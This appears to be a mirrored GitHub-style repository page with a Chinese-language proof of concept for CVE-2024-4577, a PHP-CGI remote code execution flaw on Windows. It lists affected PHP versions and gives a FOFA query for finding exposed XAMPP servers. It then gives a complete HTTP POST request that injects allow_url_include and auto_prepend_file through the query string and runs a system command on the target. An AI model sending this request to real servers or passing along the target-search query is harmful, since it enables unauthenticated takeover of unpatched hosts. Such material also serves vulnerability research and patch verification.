admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-06 19:07:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/php/PHPCGIWindows平台远程代码执行漏洞(CVE-2024-4577).md

40 lines
1.3 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
# 一、漏洞简介
<font style="color:rgb(53, 53, 53);">PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系简体中文936/繁体中文950/日文932等攻击者可构造恶意请求绕过 CVE-2012-1823 补丁从而可在无需登陆的情况下执行任意PHP代码。</font>
# 二、影响版本
```java
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
利用条件:
1、用户认证无需用户认证
2、前置条件默认配置
3、触发方式远程
```
# 三、资产测绘
+ fofa`app="XAMPP" `
+ 特征
![1717781448311-7a65fa38-1b93-46b2-866e-bc4080028b76.png](./img/kDk7tGfPzFbz3N1v/1717781448311-7a65fa38-1b93-46b2-866e-bc4080028b76-703129.png)
# 四、漏洞复现
```java
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1
Host:
REDIRECT-STATUS:1
Content-type: text/html; charset=UTF-8
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
<?php system("whoami")?>
```
![1717781553755-883046d2-ce02-4bcc-95fe-c4c98e0f1bae.png](./img/kDk7tGfPzFbz3N1v/1717781553755-883046d2-ce02-4bcc-95fe-c4c98e0f1bae-406115.png)
> 更新: 2024-09-05 23:27:24
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tihl0itqro7zdhy5>
Reference in New Issue Copy Permalink